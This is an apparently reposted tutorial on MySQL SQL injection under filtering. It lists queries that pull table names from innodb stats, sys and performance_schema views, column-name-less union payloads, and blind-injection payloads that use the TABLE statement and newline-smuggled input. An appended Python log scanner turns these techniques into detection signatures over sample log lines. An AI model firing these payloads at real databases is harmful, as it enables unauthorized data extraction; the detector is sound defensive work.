SQL Injection: Retrieving Table Names Under Restrictions, Column-Name-Less Injection

Updated: 2023-06-19 07:13:52

Retrieving table names
innodb
MySQL 5.6 and later have the tables innodb_index_stats and innodb_table_stats, which record newly created databases and tables
select table_name from mysql.innodb_table_stats where database_name = database();
select table_name from mysql.innodb_index_stats where database_name = database();
sys
MySQL 5.7.9 added several views to sys from which table names can be obtained
//view names containing "in"
SELECT object_name FROM `sys`.`x$innodb_buffer_stats_by_table` WHERE object_schema = DATABASE();
SELECT object_name FROM `sys`.`innodb_buffer_stats_by_table` WHERE object_schema = DATABASE();
SELECT TABLE_NAME FROM `sys`.`x$schema_index_statistics` WHERE TABLE_SCHEMA = DATABASE();
SELECT TABLE_NAME FROM `sys`.`schema_auto_increment_columns` WHERE TABLE_SCHEMA = DATABASE();
//view names not containing "in"
SELECT TABLE_NAME FROM `sys`.`x$schema_flattened_keys` WHERE TABLE_SCHEMA = DATABASE();
SELECT TABLE_NAME FROM `sys`.`x$ps_schema_table_statistics_io` WHERE TABLE_SCHEMA = DATABASE();
SELECT TABLE_NAME FROM `sys`.`x$schema_table_statistics_with_buffer` WHERE TABLE_SCHEMA = DATABASE();
//retrieving table names from the storage path of the table files
SELECT FILE FROM `sys`.`io_global_by_file_by_bytes` WHERE FILE REGEXP DATABASE();
SELECT FILE FROM `sys`.`io_global_by_file_by_latency` WHERE FILE REGEXP DATABASE();
SELECT FILE FROM `sys`.`x$io_global_by_file_by_bytes` WHERE FILE REGEXP DATABASE();
Views that record previously executed queries
SELECT QUERY FROM sys.x$statement_analysis WHERE QUERY REGEXP DATABASE();
SELECT QUERY FROM `sys`.`statement_analysis` WHERE QUERY REGEXP DATABASE();
Performance_Schema
SELECT object_name FROM `performance_schema`.`objects_summary_global_by_type` WHERE object_schema = DATABASE();
SELECT object_name FROM `performance_schema`.`table_handles` WHERE object_schema = DATABASE();
SELECT object_name FROM `performance_schema`.`table_io_waits_summary_by_index_usage` WHERE object_schema = DATABASE();
SELECT object_name FROM `performance_schema`.`table_io_waits_summary_by_table` WHERE object_schema = DATABASE();
SELECT object_name FROM `performance_schema`.`table_lock_waits_summary_by_table` WHERE object_schema = DATABASE();
Tables that record previously executed queries
SELECT digest_text FROM `performance_schema`.`events_statements_summary_by_digest` WHERE digest_text REGEXP DATABASE();
Tables that contain table file paths
SELECT file_name FROM `performance_schema`.`file_instances` WHERE file_name REGEXP DATABASE();
Column-name-less injection
Using union select
select c from (select 1 as a, 1 as b, 1 as c union select * from test)x limit 1 offset 1
select `3` from(select 1,2,3 union select * from admin)a limit 1,1
//version without commas, using join
select a from (select * from (select 1 `a`)m join (select 2 `b`)n join (select 3 `c`)t where 0 union select * from test)x;
Blind injection
((SELECT 1,concat('{result+chr(mid)}', cast("0" as JSON)))<(SELECT * FROM `f1ag_1s_h3r3_hhhhh`))
The select that follows must return exactly one row. MySQL compares char values case-insensitively, so for blind injection either hex or binary can be used.
Here only concat can be used to join the character string with a binary value so that the comparison becomes case-sensitive; JSON can also be replaced with char byte.
Without select
MySQL 8.0.19 added the TABLE statement
TABLE table_name [ORDER BY column_name] [LIMIT number [OFFSET number]]
table t can be understood simply as select * from t; the differences from select are:
table always shows all columns of the table
table does not allow any row filtering; that is, TABLE does not support any WHERE clause.
It can be used for blind injection of table names
admin'and\x0a(table\x0ainformation_schema.TABLESPACES_EXTENSIONS\x0alimit\x0a7,1)> (BINARY('{}'),'0')#
It also sidesteps the problem that, when select is filtered, only the same table can be queried.
PS: the newly added VALUES statement is also quite interesting; in some cases it seems able to replace union or select for order by blind injection.
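As an added, defender-side example that is not part of the original post: a small Python scanner that turns the techniques above into signatures and runs them over constructed MySQL general-log entries, flagging statements that read the sys / performance_schema / mysql.innodb_*_stats metadata sources, use the TABLE statement as a subquery, or use the "union select *" derived-table trick. It assumes the general log is in the MySQL 5.7/8.0 text format; the log lines, connection ids, user and table names are constructed for the example.

```python
import re

# Signatures for the techniques the post describes (regexes written for this example,
# not taken from the post); \s also matches the newline/tab used in the post's \x0a payloads.
SIGNATURES = {
    # information_schema substitutes: mysql.innodb_table_stats / mysql.innodb_index_stats
    "innodb_stats": re.compile(r"\bmysql`?\s*\.\s*`?innodb_(?:table|index)_stats", re.I),
    # any sys schema view, including the x$ variants
    "sys_schema": re.compile(r"\bsys`?\s*\.\s*`?(?:x\$)?[a-z_]+", re.I),
    "performance_schema": re.compile(r"\bperformance_schema`?\s*\.", re.I),
    # MySQL 8.0.19 TABLE statement used as a subquery, e.g. "(table db.t limit 7,1)"
    "table_statement": re.compile(r"(?:^|\()\s*table\s+[`\w]+\s*\.\s*[`\w]+", re.I),
    # column-name-less extraction: placeholder columns then "union select * from"
    "union_no_column": re.compile(r"\bunion\s+(?:all\s+)?select\s+\*\s+from\b", re.I),
}

# One general-log entry: "<ISO timestamp>\t<conn id> <command>\t<text>"; text may span lines.
LOG_ENTRY = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\dT[\d:.]+Z)\s+(?P<conn>\d+)\s+(?P<cmd>\w+)\t"
    r"(?P<text>.*?)(?=^\d{4}-\d\d-\d\dT|\Z)",
    re.M | re.S,
)

def classify(statement):
    """Names of the post's techniques that the statement matches ([] if none)."""
    return [name for name, rx in SIGNATURES.items() if rx.search(statement)]

def scan_general_log(log_text):
    """(connection id, matched techniques, statement) for every suspicious Query entry."""
    hits = []
    for entry in LOG_ENTRY.finditer(log_text):
        if entry.group("cmd") != "Query":
            continue  # Connect/Quit/Init DB entries carry no statement
        matched = classify(entry.group("text"))
        if matched:
            hits.append((int(entry.group("conn")), matched, entry.group("text").strip()))
    return hits

# Constructed sample log: one benign query plus three statements built from the post's payloads.
SAMPLE_LOG = (
    "2023-06-19T07:13:52.000001Z\t   12 Connect\twebapp@10.0.0.5 on shop using TCP/IP\n"
    "2023-06-19T07:13:52.000002Z\t   12 Query\tSELECT name, price FROM products WHERE id = 7\n"
    "2023-06-19T07:13:53.000003Z\t   12 Query\tSELECT name FROM products WHERE id = 7 "
    "union select table_name from mysql.innodb_table_stats where database_name = database()\n"
    "2023-06-19T07:13:54.000004Z\t   12 Query\tSELECT name FROM products WHERE id = 7 and\n"
    "(table\ninformation_schema.TABLESPACES_EXTENSIONS\nlimit\n7,1) > (BINARY('a'),'0')\n"
    "2023-06-19T07:13:55.000005Z\t   13 Query\tSELECT `3` from(select 1,2,3 union select * from admin)a limit 1,1\n"
    "2023-06-19T07:13:56.000006Z\t   13 Quit\t\n"
)
```

Running scan_general_log(SAMPLE_LOG) flags the three injected statements and leaves the benign product lookup alone; the sys and performance_schema signatures fire on the queries listed earlier on this page.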
Published: 2023-06-19 07:13:52

Original link: https://www.wtabcd.cn/fanwen/fan/82/989249.html
